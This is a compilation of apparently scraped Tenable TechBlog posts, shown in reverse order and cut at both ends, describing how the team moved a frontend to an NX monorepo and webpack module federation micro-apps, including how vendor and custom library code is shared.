Hybrid Sharing Leads To Bloat — When we first started using module federation, we had a library called tenable.io/common. This was a relic from our initial architecture and essentially housed all the shared code that our various applications used. Since this was originally a directory (and not a library), our imports from it varied quite a bit. As shown below, at times we imported from the main index file of tenable-io/common (tenable-io/common.js), but in other instances we imported from sub directories (ex. tenable-io/common/component.js) and even specific files (tenable-io/component/component1.js). To avoid updating all of these import statements to use a consistent approach (ex. only importing from the index of tenable-io/common), we opted to expose every single file in this directory and shared it via module federation.
To demonstrate why this was a bad idea, we’ll walk through each of these import types: starting from the most global in nature (importing the main index file) and moving towards the most granular (importing a specific file). As shown below, the application begins by importing the main index file which exposes everything in tenable-io/common. This means that when webpack bundles everything together, one large file is created for this import statement that contains everything (we’ll call it common.js).
We then move down a level in our import statements and import from subdirectories within tenable-io/common (components and utilities). Similar to our main index file, these import statements contain everything within their directories. Can you see the problem? This code is already contained in the common.js file above. We now have bloat in our system that causes the customer to pull down more javascript than necessary.
We now get to the most granular import statement where we’re importing from a specific file. At this point, we have a lot of bloat in our system as these individual files are already contained within both import types above.
As you can imagine, this can have a dramatic impact on the performance of your application. For us, this was evident in our application early on and it was not until we did a thorough performance analysis that we discovered the culprit. We highly recommend you evaluate the structure of your libraries and determine what’s going to work best for you.
Sharing State/Storage/Theme — While we tried to keep our micro-apps as independent of one another as possible, we did have instances where we needed them to share state and theming. Typically, shared code lives in an actual file (some-file.js) that resides within a micro-app’s bundle. For example, let’s say we have a notifications library shared between the micro-apps. In the first update, the presentation portion of this library is updated. However, only App B gets deployed to production with the new code. In this case, that’s okay because the code is constrained to an actual file. In this instance, App A and B will use their own versions within each of their bundles. As a result, they can both operate independently without bugs.
However, when it comes to things like state (Redux for us), storage (window.storage, document.cookies, etc.) and theming (styled-components for us), you cannot rely on this. This is because these items live in memory and are shared at a global level, which means you can’t rely on them being confined to a physical file. To demonstrate this, let’s say that we’ve made a change to the way state is getting stored and accessed. Specifically, we went from storing our notifications under an object called notices to storing them under notifications. In this instance, once our applications get out of sync on production (i.e. they’re not leveraging the same version of shared code where this change was made), the applications will attempt to store and access notifications in memory in two different ways. If you are looking to create challenging bugs, this is a great way to do it.
As we soon discovered, most of our bugs/issues resulting from this new architecture came as a result of updating one of these areas (state, theme, storage) and allowing the micro-apps to deploy at their own pace. In these instances, we needed to ensure that all the micro-apps were deployed at the same time to ensure the applications and the state, store, and theming were all in sync. You can read more about how we handled this via a Jenkins bootstrapper job in the next article.
Summary
At this point you should have a fairly good grasp on how both vendor libraries and custom libraries are shared in the module federation system. See the next article in the series to learn how we build and deploy our application.
7. Module Federation — Sharing Library Code was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.
6. Module Federation — Sharing Vendor Code
Module Federation — Sharing Vendor Code
This is post 6 of 9 in the series
- Introduction
- Why We Implemented a Micro Frontend
- Introducing the Monorepo & NX
- Introducing Module Federation
- Module Federation — Managing Your Micro-Apps
- Module Federation — Sharing Vendor Code
- Module Federation — Sharing Library Code
- Building & Deploying
- Summary
Overview
This article focuses on the importance of sharing vendor library code between applications and some related best practices.
The Problem
One of the most important aspects of using module federation is sharing code. When a micro-app gets built, it contains all the files it needs to run. As stated by webpack, “These separate builds should not have dependencies between each other, so they can be developed and deployed individually”. In reality, this means if you build a micro-app and investigate the files, you will see that it has all the code it needs to run independently. In this article, we’re going to focus on vendor code (the code coming from your node_modules directory). However, as you’ll see in the next article of the series, this also applies to your custom libraries (the code living in libs). As illustrated below, App A and B both use vendor lib 6, and when these micro-apps are built they each contain a version of that library within their build artifact.
Why is this important? We’ll use the diagram below to demonstrate. Without sharing code between the micro-apps, when we load in App A, it loads in all the vendor libraries it needs. Then, when we navigate to App B, it also loads in all the libraries it needs. The issue is that we’ve already loaded in a number of libraries when we first loaded App A that could have been leveraged by App B (ex. Vendor Lib 1). From a customer perspective, this means they’re now pulling down a lot more Javascript than they should be.
The Solution
This is where module federation shines. By telling module federation what should be shared, the micro-apps can now share code between themselves when appropriate. Now, when we load App B, it’s first going to check and see what App A already loaded in and leverage any libraries it can. If it needs a library that hasn’t been loaded in yet (or the version it needs isn’t compatible with the version App A loaded in), then it proceeds to load its own. For example, App A needs Vendor lib 5, but since no other application is using that library, there’s no need to share it.
Sharing code between the micro-apps is critical for performance and ensures that customers are only pulling down the code they truly need to run a given application.
Diving Deeper
Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about sharing vendor code between your micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.
Now that we understand how libraries are built for each micro-app and why we should share them, let’s see how this actually works. The shared property of the ModuleFederationPlugin is where you define the libraries that should be shared between the micro-apps. Below, we are passing a variable called npmSharedLibs to this property:
If we print out the value of that variable, we’ll see the following:
This tells module federation that the three libraries should be shared, and more specifically that they are singletons. This means it could actually break our application if a micro-app attempted to load its own version. Setting singleton to true ensures that only one version of the library is loaded (note: this property will not be needed for most libraries). You’ll also notice we set a version, which comes from the version defined for the given library in our package.json file. This is important because anytime we update a library, that version will dynamically change. Libraries only get shared if they have a compatible version. You can read more about these properties here.
If we spin up the application and investigate the network traffic with a focus on the react library, we’ll see that only one file gets loaded in and it comes from port 3000 (our Host application). This is a result of defining react in the shared property:
Now let’s take a look at a vendor library that hasn’t been shared yet, called @styled-system/theme-get. If we investigate our network traffic, we’ll discover that this library gets embedded into a vendor file for each micro-app. The three files highlighted below come from each of the micro-apps. You can imagine that as your libraries grow, the size of these vendor files may get quite large, and it would be better if we could share these libraries.
We will now add this library to the shared property:
If we investigate the network traffic again and search for this library, we’ll see it has been split into its own file. In this case, the Host application (which loads before everything else) loads in the library first (we know this since the file is coming from port 3000). When the other applications load in, they determine that they don’t have to use their own version of this library since it’s already been loaded in.
This very significant feature of module federation is critical for an architecture like this to succeed from a performance perspective.
Summary
Sharing code is one of the most important aspects of using module federation. Without this mechanism in place, your application would suffer from performance issues as your customers pull down a lot of duplicate code each time they accessed a different micro-app. Using the approaches above, you can ensure that your micro-apps are both independent but also capable of sharing code between themselves when appropriate. This the best of the both worlds, and is what allows a micro-frontend architecture to succeed. Now that you understand how vendor libraries are shared, we can take the same principles and apply them to our self-created libraries that live in the libs directory, which we discuss in the next article of the series.
6. Module Federation — Sharing Vendor Code was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.
5. Module Federation — Managing Your Micro-Apps
Module Federation — Managing Your Micro-Apps
This is post 5 of 9 in the series
- Introduction
- Why We Implemented a Micro Frontend
- Introducing the Monorepo & NX
- Introducing Module Federation
- Module Federation — Managing Your Micro-Apps
- Module Federation — Sharing Vendor Code
- Module Federation — Sharing Library Code
- Building & Deploying
- Summary
Overview
The Problem
When you first start using module federation and only have one or two micro-apps, managing the configurations for each app and the various ports they run on is simple.
As you progress and continue to add more micro-apps, you may start running into issues with managing all of these micro-apps. You will find yourself repeating the same configuration over and over again. You’ll also find that the Host application needs to know which micro-app is running on which port, and you’ll need to avoid serving a micro-app on a port already in use.
The Solution
To reduce the complexity of managing these various micro-apps, we consolidated our configurations and the serve command (to spin up the micro-apps) into a central location within a newly created tools directory:
Diving Deeper
Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about how we dealt with managing an ever growing number of micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.
The Serve Command
One of the most important things we did here was create a serve.js file that allowed us to build/serve only those micro-apps an engineer needed to work on. This increased the speed at which our engineers got the application running, while also consuming as little local memory as possible. Below is a general breakdown of what that file does:
You can see in our webpack configuration below where we send the ready message (line 193). The serve command above listens for that message (line 26 above) and uses it to keep track of when a particular micro-app is done compiling.
Remote Utilities
Additionally, we created some remote utilities that allowed us to consistently manage our remotes. Specifically, it would return the name of the remotes along with the port they should run on. As you can see below, this logic is based on the workspace.json file. This was done so that if a new micro-app was added it would be automatically picked up without any additional configuration by the engineer.
Putting It All Together
Why was all this necessary? One of the powerful features of module federation is that all micro-apps are capable of being built independently. This was the purpose of the serve script shown above, i.e. it enabled us to spin up a series of micro-apps based on our needs. For example, with this logic in place, we could accommodate a host of various engineering needs:
- Host only — If we wanted to spin up the Host application we could run npm run serve (the command defaults to spinning up Host).
- Host & Application1 — If we wanted to spin up both Host and Application1, we could run npm run serve --apps=application-1.
- Application2 Only — If we already had the Host and Application1 running, and we now wanted to spin up Application2 without having to rebuild things, we could run npm run serve --apps=application-2 --appOnly.
- All — If we wanted to spin up everything, we could run npm run serve --all.
You can easily imagine that as your application grows and your codebase gets larger and larger, this type of functionality can be extremely powerful since you only have to build the parts of the application related to what you’re working on. This allowed us to speed up our boot time by 2x and our rebuild time by 7x, which was a significant improvement.
Note: If you use Visual Studio, you can accomplish some of this same functionality through the NX Console extension.
Loading Your Micro-Apps — The Static Approach
In the previous article, when it came to importing and using Application 1 and 2, we simply imported the micro-apps at the top of the bootstrap file and hard coded the remote entries in the index.html file:
However in the real world, this is not the best approach. By taking this approach, the moment your application runs, it is forced to load in the remote entry files for every single micro-app. For a real world application that has many micro-apps, this means the performance of your initial load will most likely be impacted. Additionally, loading in all the micro-apps as we’re doing in the index.html file above is not very flexible. Imagine some of your micro-apps are behind feature flags that only certain customers can access. In this case, it would be much better if the micro-apps could be loaded in dynamically only when a particular route is hit.
In our initial approach with this new architecture, we made this mistake and paid for it from a performance perspective. We noticed that as we added more micro-apps, our initial load was getting slower. We finally discovered the issue was related to the fact that we were loading in our remotes using this static approach.
Loading Your Micro-Apps — The Dynamic Approach
Leveraging the remote utilities we discussed above, you can see how we pass the remotes and their associated ports in the webpack build via the REMOTE_INFO property. This global property will be accessed later on in our code when it’s time to load the micro-apps dynamically.
Once we had the necessary information we needed for the remotes (via the REMOTE_INFO variable), we then updated our bootstrap.jsx file to leverage a new component we discuss below called <MicroApp />. The purpose of this component was to dynamically attach the remote entry to the page and then initialize the micro-app lazily so it could be leveraged by Host. You can see the actual component never gets loaded until we hit a path where it is needed. This ensures that a given micro-app is never loaded in until it’s actually needed, leading to a huge boost in performance.
The actual logic of the <MicroApp /> component is highlighted below. This approach is a variation of the example shown here. In a nutshell, this logic dynamically injects the <script src=”…remoteEntry.js”></script> tag into the index.html file when needed, and initializes the remote. Once initialized, the remote and any exposed component can be imported by the Host application like any other import.
Summary
By making the changes above, we were able to significantly improve our overall performance. We did this by only loading in the code we needed for a given micro-app at the time it was needed (versus everything at once). Additionally, when our team added a new micro-app, our script was capable of handling it automatically. This approach allowed our teams to work more efficiently, and allowed us to significantly reduce the initial load time of our application. See the next article to learn about how we dealt with our vendor libraries.
5. Module Federation — Managing Your Micro-Apps was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.
4. Introducing Module Federation
Introducing Module Federation
This is post 4 of 9 in the series
- Introduction
- Why We Implemented a Micro Frontend
- Introducing the Monorepo & NX
- Introducing Module Federation
- Module Federation — Managing Your Micro-Apps
- Module Federation — Sharing Vendor Code
- Module Federation — Sharing Library Code
- Building & Deploying
- Summary
Overview
As discussed in the previous article, the first step in updating our architecture involved the consolidation of our two repositories into one and the introduction of the NX framework. Once this phase was complete, we were ready to move to the next phase: the introduction of module federation for the purposes of breaking our Tenable.io application into a series of micro-apps.
The Problem
Before we dive into what module federation is and why we used it, it’s important to first understand the problem we wanted to solve. As demonstrated in the following diagram, multiple teams were responsible for individual parts of the Tenable.io application. However, regardless of the update, everything went through the same build and deployment pipeline once the code was merged to master. This created a natural bottleneck where each team was reliant on any change made previously by another team.
This was problematic for a number of reasons:
- Bugs — Imagine your team needs to deploy an update to customers for your particular application as quickly as possible. However, another team introduced a relatively significant bug that should not be deployed to production. In this scenario, you either have to wait for the other team to fix the bug or release the code to production while knowingly introducing the bug. Neither of these are good options.
- Slow to lint, test and build — As discussed previously, as an application grows in size, things such as linting, testing, and building inevitably get slower as there is simply more code to deal with. This has a direct impact on your automation server/delivery pipeline (in our case Jenkins) because the pipeline will most likely get slower as your codebase grows.
- E2E Testing Bottleneck — End-to-end tests are an important part of an enterprise application to ensure bugs are caught before they make their way to production. However, running E2E tests for your entire application can cause a massive bottleneck in your pipeline as each build must wait on the previous build to finish before proceeding. Additionally, if one team’s E2E tests fail, it blocks the other team’s changes from making it to production. This was a significant bottleneck for us.
The Solution
Let’s discuss why module federation was the solution for us. First, what exactly is module federation? In a nutshell, it is webpack’s way of implementing a micro-frontend (though it’s not limited to only implementing frontend systems). More specifically, it enables us to break apart our application into a series of smaller applications that can be developed and deployed individually, and then put back together into a single application. Let’s analyze how our deployment model above changes with this new approach.
As shown below, multiple teams were still responsible for individual parts of the Tenable.io application. However, you can see that each individual application within Tenable.io (the micro-apps) has its own Jenkins pipeline where it can lint, test, and build the code related to that individual application. But how do we know which micro-app was impacted by a given change? We rely on the NX framework discussed in the previous article. As a result of this new model, the bottleneck shown above is no longer an issue.
Diving Deeper
Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about how module federation works and the way in which things can be set up. If you wish to see the code associated with the following section, you can check it out in this branch.
Diagrams are great, but what does a system like this actually look like from a code perspective? We will build off the demo from the previous article to introduce module federation for the Tenable.io application.
Workspaces
One of the very first changes we made was to our NX workspaces. New workspaces are created via the npx create-nx-workspace command. For our purposes, the intent was to split up the Tenable.io application (previously its own workspace) into three individual micro-apps:
- Host — Think of this as the wrapper for the other micro-apps. Its primary purpose is to load in the micro-apps.
- Application 1 — Previously, this was apps/tenable-io/src/app/app-1.tsx. We are now going to transform this into its own individual micro-app.
- Application 2 — Previously, this was apps/tenable-io/src/app/app-2.tsx. We are now going to transform this into its own individual micro-app.
This simple diagram illustrates the relationship between the Host and micro-apps:
Let’s analyze a before and after of our workspace.json file that shows how the tenable-io workspace (line 5) was split into three (lines 4–6).
Before (line 5)
After (lines 4–6)
Note: When leveraging module federation, there are a number of different architectures you can leverage. In our case, a host application that loaded in the other micro-apps made the most sense for us. However, you should evaluate your needs and choose the one that’s best for you. This article does a good job in breaking these options down.
Workspace Commands
Now that we have these three new workspaces, how exactly do we run them locally? If you look at the previous demo, you’ll see our serve command for the Tenable.io application leveraged the @nrwl/web:dev-server executor. Since we’re going to be creating a series of highly customized webpack configurations, we instead opted to leverage the @nrwl/workspace:run-commands executor. This allowed us to simply pass a series of terminal commands that get run. For this initial setup, we’re going to leverage a very simple approach to building and serving the three applications. As shown in the commands below, we simply change directories into each of these applications (via cd apps/…), and run the npm run dev command that is defined in each of the micro-app’s package.json file. This command starts the webpack dev server for each application.
At this point, if we run nx serve host (serve being one of the targets defined for the host workspace) it will kick off the three commands shown on lines 10–12. Later in the article, we will show a better way of managing multiple webpack configurations across your repository.
Webpack Configuration — Host
The following configuration shows a pretty bare bones implementation for our Host application. We have explained the various areas of the configuration and their purpose. If you are new to webpack, we recommend you read through their getting started documentation to better understand how webpack works.
Some items of note include:
- ModuleFederationPlugin — This is what enables module federation. We’ll discuss some of the sub properties below.
- remotes — This is the primary difference between the host application and the applications it loads in (application 1 and 2). We define application1 and application2 here. This tells our host application that there are two remotes that exist and that can be loaded in.
- shared — One of the concepts you’ll need to get used to in module federation is the concept of sharing resources. Without this configuration, webpack will not share any code between the various micro-applications. This means that if application1 and application2 both import react, they each will use their own versions. Certain libraries (like the ones defined here) only allow you to load one version of the library for your application. This can cause your application to break if the library gets loaded in more than once. Therefore, we ensure these libraries are shared and only one version gets loaded in.
- devServer — Each of our applications has this configured, and it serves each of them on their own unique port. Note the addition of the Access-Control-Allow-Origin header: this is critical for dev mode to ensure the host application can access other ports that are running our micro-applications.
Webpack Configuration — Application
The configurations for application1 and application2 are nearly identical to the one above, with the exception of the ModuleFederationPlugin. Our applications are responsible for determining what they want to expose to the outside world. In our case, the exposes property of the ModuleFederationPlugin defines what is exposed to the Host application when it goes to import from either of these. This is the exposes property’s purpose: it defines a public API that determines which files are consumable. So in our case, we will only expose the index file (‘.’) in the src directory. You’ll see we’re not defining any remotes, and this is intentional. In our setup, we want to prevent micro-applications from importing resources from each other; if they need to share code, it should come from the libs directory.
In this demo, we’re keeping things as simple as possible. However, you can expose as much or as little as you want based on your needs. So if, for example, we wanted to expose an individual component, we could do that using the following syntax:
Initial Load
When we run nx serve host, what happens? The entry point for our host application is the index.js file shown below. This file imports another file called boostrap.js. This approach avoids the error “Shared module is not available for eager consumption,” which you can read more about here.
The bootstrap.js file is the real entry point for our Host application. We are able to import Application1 and Application2 and load them in like a normal component (lines 15–16):
Note: Had we exposed more specific files as discussed above, our import would be more granular in nature:
At this point, you might think we’re done. However, if you ran the application you would get the following error message, which tells us that the import on line 15 above isn’t working:
Loading The Remotes
To understand why this is, let’s take a look at what happens when we build application1 via the webpack-dev-server command. When this command runs, it actually serves this particular application on port 3001, and the entry point of the application is a file called remoteEntry.js. If we actually go to that port/file, we’ll see something that looks like this:
In the module federation world, application 1 & 2 are called remotes. According to their documentation, “Remote modules are modules that are not part of the current build and loaded from a so-called container at the runtime”. This is how module federation works under the hood, and is the means by which the Host can load in and interact with the micro-apps. Think of the remote entry file shown above as the public interface for Application1, and when another application loads in the remoteEntry file (in our case Host), it can now interact with Application1.
We know application 1 and 2 are getting built, and they’re being served up at ports 3001 and 3002. So why can’t the Host find them? The issue is because we haven’t actually done anything to load in those remote entry files. To make that happen, we have to open up the public/index.html file and add those remote entry files in:
Now if we run the host application and investigate the network traffic, we’ll see the remoteEntry.js file for both application 1 and 2 get loaded in via ports 3001 and 3002:
Summary
At this point, we have covered a basic module federation setup. In the demo above, we have a Host application that is the main entry point for our application. It is responsible for loading in the other micro-apps (application 1 and 2). As we implemented this solution for our own application we learned a number of things along the way that would have been helpful to know from the beginning. See the following articles to learn more about the intricacies of using module federation:
- Module Federation — Managing Your Micro-Apps — How we dealt with managing an ever growing number of micro-apps and their associated configurations.
- Module Federation — Sharing Vendor Code — Learn the importance of sharing vendor code between your micro-apps.
- Module Federation — Sharing Library Code — Learn the importance of sharing your custom library code between your micro-apps.
4. Introducing Module Federation was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.
3. Introducing The Monorepo & NX
Introducing The Monorepo & NX
This is post 3 of 9 in the series
- Introduction
- Why We Implemented a Micro Frontend
- Introducing the Monorepo & NX
- Introducing Module Federation
- Module Federation — Managing Your Micro-Apps
- Module Federation — Sharing Vendor Code
- Module Federation — Sharing Library Code
- Building & Deploying
- Summary
Overview
In this next phase of our journey, we created a monorepo built off the NX framework. The focus of this article is on how we leverage NX to identify which part of the repository changed, allowing us to only rebuild that portion. As discussed in the previous article, our teams were plagued by a series of issues that we believed could be solved by moving towards a new architecture. Before we dive into the first phase of this new architecture, let’s recap one of the issues we were facing and how we solved it during this first phase.
The Problem
Our global components lived in an entirely different repository, where they had to be published and pulled down through a versioning system. To do this, we leveraged Lerna and Nexus, which is similar to how 3rd-party NPM packages are deployed and utilized. As a result of this model, we constantly dealt with issues pertaining to component isolation and breaking changes.
To address these issues, we wanted to consolidate the Design System and Tenable.io repositories into one. To ensure our monorepo would be fast and efficient, we also introduced the NX framework to only rebuild parts of the system that were impacted by a change.
The Solution
The Monorepo Is Born
The first step in updating our architecture was to bring the Design System into the Tenable.io repository. This involved the following:
- Design System components — The components themselves were broken apart into a series of subdirectories that all lived under libs/design-system. In this way, they could live alongside our other Tenable.io specific libraries.
- Design System website — The website (responsible for documenting the components) was moved to live alongside the Tenable.io application in a directory called apps/design-system.
The following diagram shows how we created the new monorepo based on these changes.
It’s important to note that at this point, we made a clear distinction between applications and libraries. This distinction is important because we wanted to ensure a clear import order: that is, we wanted applications to be able to consume libraries but never the other way around.
Leveraging NX
In addition to moving the design system, we also wanted the ability to only rebuild applications and libraries based on what was changed. In a monorepo where you may end up having a large number of applications and libraries, this type of functionality is critical to ensure your system doesn’t grow slower over time.
Let’s use an example to demonstrate the intended functionality: In our example, we have a component that is initially only imported by the Design System site. If an engineer changes that component, then we only want to rebuild the Design System because that’s the only place that was impacted by the change. However, if Tenable.io was leveraging that component as well, then both applications would need to be rebuilt. To manage this complexity, we rebuilt the repository using NX.
So what is NX? NX is a set of tools that enables you to separate your libraries and applications into what NX calls “workspaces”. Think of a workspace as an area in your repository (i.e. a directory) that houses shared code (an application, a utility library, a component library, etc.). Each workspace has a series of commands that can be run against it (build, serve, lint, test, etc.). This way when a workspace is changed, the nx affected command can be run to identify any other workspace that is impacted by the update. As demonstrated here, when we change Component A (living in the design-system/components workspace) and run the affected command, NX indicates that the following three workspaces are impacted by that change: design-system/components, Tenable.io, and Design System. This means that both the Tenable.io and Design System applications are importing that component.
This type of functionality is critical for a monorepo to work as it scales in size. Without this your automation server (Jenkins in our case) would grow slower over time because it would have to rebuild, re-lint, and re-test everything whenever a change was made. If you want to learn more about how NX works, please take a look at this write up that explains some of the above concepts in more detail.
Diving Deeper
Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about how NX works and the way in which things can be set up. If you wish to see the code associated with the following section, you can check it out in this branch.
At this point, our repository looks something like the structure of defined workspaces below:
Apps
- design-system — The static site (built off of Gatsby) that documents our global components.
- tenable-io — Our core application that was already in the repository.
Libs
- design-system/components — A library that houses our global components.
- design-system/styles — A library that is responsible for setting up our global theme provider.
- tenable-io/common — The pre-existing shared code that the Tenable.io application was leveraging and sharing throughout the application.
To reiterate, a workspace is simply a directory in your repository that houses shared code that you want to treat as either an application or a library. The difference here is that an application is standalone in nature and shows what your consumers see, whereas a library is something that is leveraged by n+ applications (your shared code). As shown below, each workspace can be configured with a series of targets (build, serve, lint, test) that can be run against it. This way if a change has been made that impacts the workspace and we want to build all of them, we can tell NX to run the build target (line 6) for all affected workspaces.
At this point, our two demo applications resemble the screenshots below. As you can see, there are three library components in use. These are the black, gray, and blue colored blocks on the page. Two of these come from the design-system/components workspace (Test Component 1 & 2), and the other comes from tenable-io/common (Tenable.io Component). These components will be used to demonstrate how applications and libraries are leveraged and relate to one another in the NX framework.
The Power Of NX
Now that you know what our demo application looks like, it’s time to demonstrate the importance of NX. Before we make any updates, we want to showcase the dependency graph that NX uses when analyzing our repository. By running the command nx dep-graph, the following diagram appears and indicates how our various workspaces are related. A relationship is established when one app/lib imports from another.
We now want to demonstrate the true power and purpose of NX. We start by running the nx affected:apps and nx affected:libs command with no active changes in our repository. Shown below, no apps or libs are returned by either of these commands. This indicates that there are no changes currently in our repository, and, as a result, nothing has been affected.
Now we will make a slight update to our test-component-1.tsx file (line 19):
If we re-run the affected commands above we see that the following apps/lib are impacted: design-system, tenable-io, and design-system/components:
Additionally, if we run nx affected:dep-graph we see the following diagram. NX is showing us the above command in visual form, which can be helpful in understanding why the change you made impacted a given application or library.
With all of this in place, we can now accomplish a great deal. For instance, a common scenario (and one our initial goals from the previous article) is to run tests for just the workspaces actually impacted by a code change. If we change a global component, we want to run all the unit tests that may have been impacted by that change. This way, we can ensure that our update is truly backwards compatible (which gets harder and harder as a component is used in more locations). We can accomplish this by running the test target on the affected workspaces:
Summary
Now you are familiar with how we set up our monorepo and incorporated the NX framework. By doing this, we were able to accomplish two of the goals we started with:
- Global components should live in close proximity to the code leveraging those components. This ensures they are flexible enough to satisfy the needs of the engineers using them.
- Updates to global components should be tested in real time against the code leveraging those components. This ensures the updates are backwards compatible and non-breaking in nature.
Once we successfully set up our monorepo and incorporated the NX framework, our next step was to break apart the Tenable.io application into a series of micro applications that could be built and deployed independently. See the next article in the series to learn how we did this and the lessons we learned along the way.
3. Introducing The Monorepo & NX was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.
2. Why We Implemented A Micro Frontend
Why We Implemented A Micro Frontend
This is post 2 of 9 in the series
- Introduction
- Why We Implemented a Micro Frontend
- Introducing the Monorepo & NX
- Introducing Module Federation
- Module Federation — Managing Your Micro-Apps
- Module Federation — Sharing Vendor Code
- Module Federation — Sharing Library Code
- Building & Deploying
- Summary
Overview
This article documents the discovery phase of our journey toward a new architecture. Like any engineering group, we didn’t simply wake up one day and decide it would be fun to rewrite our entire architecture. Rather, we found ourselves with an application that was growing exponentially in size and complexity, and discovered that our existing architecture didn’t support this type of growth for a variety of reasons. Before we dive into how we revamped our architecture to fix these issues, let’s set the stage by outlining what our architecture used to look like and where the problems existed.
Our Initial Architecture
When one of our core applications (Tenable.io) was first built, it consisted of two separate repositories:
- Design System Repository — This contained all the global components that were used by Tenable.io. For each iteration of a given component, it was published to a Nexus repository (our private npm repository) leveraging Lerna. Package versions were incremented following semver (ex. 1.0.0). Additionally, it also housed a static design system site, which was responsible for documenting the components and how they were to be used.
- Tenable.io Repository — This contained a single page application built using webpack. The application itself pulled down components from the Nexus repository according to the version defined in the package.json.
This was a fairly traditional architecture and served us well for some time. Below is a simplified diagram of what this architecture looked like:
The Problem
As our application continued to grow, we created more teams to manage individual parts of the application. While this was beneficial in the sense that we were able to work at a quicker pace, it also led to a variety of issues.
Component Isolation
Due to global components living in their own repository, we began encountering an issue where components did not always work appropriately when they were integrated into the actual application. While developing a component in isolation is nice from a developmental standpoint, the reality is that the needs of an application are diverse, and typically this means that a component must be flexible enough to account for these needs. As a result, it becomes extremely difficult to determine if a component is going to work appropriately until you actually try to leverage it in your application.
Solution #1 — Global components should live in close proximity to the code leveraging those components. This ensures they are flexible enough to satisfy the needs of the engineers using them.
Component Bugs & Breaking Changes
We also encountered a scenario where a bug was introduced in a given component but was not found or realized until a later date. Since component updates were made in isolation within another repository, engineers working on the Tenable.io application would only pull in updated components when necessary. When this did occur, they were typically jumping between multiple versions at once (ex. 1.0.0 to 1.4.5). When the team discovered a bug, it may have been from one of the versions in between (ex. 1.2.2). Trying to backtrack and identify which particular version introduced the bug was a time-consuming process.
Solution #2 — Updates to global components should be tested in real time against the code leveraging those components. This ensures the updates are backwards compatible and non-breaking in nature.
One Team Blocks All Others
One of the most significant issues we faced from an architectural perspective was the blocking nature of our deployments. Even though a large number of teams worked on different areas of the application that were relatively isolated, if just one team introduced a breaking change it blocked all the other teams.
Solution #3 — Feature teams should move at their own pace, and their impact on one another should be limited as much as possible.
Slow Development
As we added more teams and more features to Tenable.io, the size of our application continued to grow, as demonstrated below.
If you’ve ever been the one responsible for managing the webpack build of your application, you’ll know that the bigger your application gets, the slower your build becomes. This is simply a result of having more code that must be compiled/re-compiled as engineers develop features. This not only impacted local development, but our Jenkins build was also getting slower over time as things grew, because it had to lint, test, and build more and more over time. We employed a number of solutions in an attempt to speed up our build, including: The DLL Plugin, SplitChunksPlugin, Tweaking Our Minification Configuration, etc. However, we began realizing that at a certain point there wasn’t much more we could do and we needed a better way to build out the different parts of the application (note: something like parallel-webpack could have helped here if we had gone down a different path).
Solution #4 — Engineers should be capable of building the application quickly for development purposes regardless of the size of the application as it grows over time. In addition, Jenkins should be capable of testing, linting, and building the application in a performant manner as the system grows.
The Solution
At a certain point, we decided that our architecture was not satisfying our needs. As a result, we made the decision to update it. Specifically, we believed that moving towards a monorepo based on a micro-frontend architecture would help us address these needs by offering the following benefits:
- Monorepo — While definitions vary, in our case a monorepo is a single repository that houses multiple applications. Moving to a monorepo would entail consolidating the Design System and the Tenable.io repositories into one. By combining them into one repository, we can ensure that updates made to components are tested in real time by the code consuming them and that the components themselves are truly satisfying the needs of our engineers.
- Micro-Frontend — As defined here, a “Micro-frontend architecture is a design approach in which a front-end app is decomposed into individual, semi-independent ‘microapps’ working loosely together.” For us, this means splitting apart the Tenable.io application into multiple micro-applications (we’ll use this term moving forward). Doing this allows teams to move at their own pace and limit their impact on one another. It also speeds up the time to build the application locally by allowing engineers to choose which micro applications to build and run.
Summary
With these things in mind, we began to develop a series of architectural diagrams and roadmaps that would enable us to move from point A to point B. Keep in mind, though, at this point we were dealing with an enterprise application that was in active development and in use by customers. For anyone who has ever been through this process, trying to revamp your architecture at this stage is somewhat akin to changing a tyre while driving.
As a result, we had to ensure that as we moved towards this new architecture, our impact on the normal development and deployment of the application was minimal. While there were plenty of bumps and bruises along the way, which we will share as we go, we were able to accomplish this through a series of phases. In the following articles, we will walk through these phases. See the next article to learn how we moved to a monorepo leveraging the NX framework.
2. Why We Implemented A Micro Frontend was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.
1. Introduction: Our Journey Implementing a Micro Frontend
Introduction: Our Journey Implementing a Micro Frontend
In the current world of frontend development, picking the right architecture and tech stack can be challenging. With all of the libraries, frameworks, and technologies available, it can seem (to say the least) overwhelming. Learning how other companies tackle a particular challenge is always beneficial to the community as a whole. Therefore, in this series, we hope to share the lessons we have learned in creating a successful micro-frontend architecture.
What This Series is About
While the term “micro-frontend” has been around for some time, the manner in which you build this type of architecture is ever evolving. New solutions and strategies are introduced all the time, and picking the one that is right for you can seem like an impossible task. This series focuses on creating a micro-frontend architecture by leveraging the NX framework and webpack’s module federation (released in webpack 5). We’ll detail each of our phases from start to finish, and document what we encountered along the way.
The series is broken up into the following articles:
- Why We Implemented a Micro Frontend — Explains the discovery phase shown in the infographic above. It talks about where we started and, specifically, what our architecture used to look like and where the problems within that architecture existed. It then goes on to describe how we planned to solve our problems with a new architecture.
- Introducing the Monorepo and NX — Documents the initial phase of updating our architecture, during which we created a monorepo built off the NX framework. This article focuses on how we leverage NX to identify which part of the repository changed, allowing us to only rebuild that portion.
- Introducing Module Federation — Documents the next phase of updating our architecture, where we broke up our main application into a series of smaller applications using webpack’s module federation.
- Module Federation — Managing Your Micro-Apps —Focuses on how we enhanced our initial approach to building and serving applications using module federation, namely by consolidating the related configurations and logic.
- Module Federation — Sharing Vendor Code —Details the importance of sharing vendor library code between applications and some related best practices.
- Module Federation — Sharing Library Code — Explains the importance of sharing custom library code between applications and some related best practices.
- Building and Deploying — Documents the final phase of our new architecture where we built and deployed our application utilizing our new micro-frontend model.
- Summary —Reviews everything we discussed and provides some key takeaways from this series.
Who is This For?
If you find yourself in any of the categories below, then this series is for you:
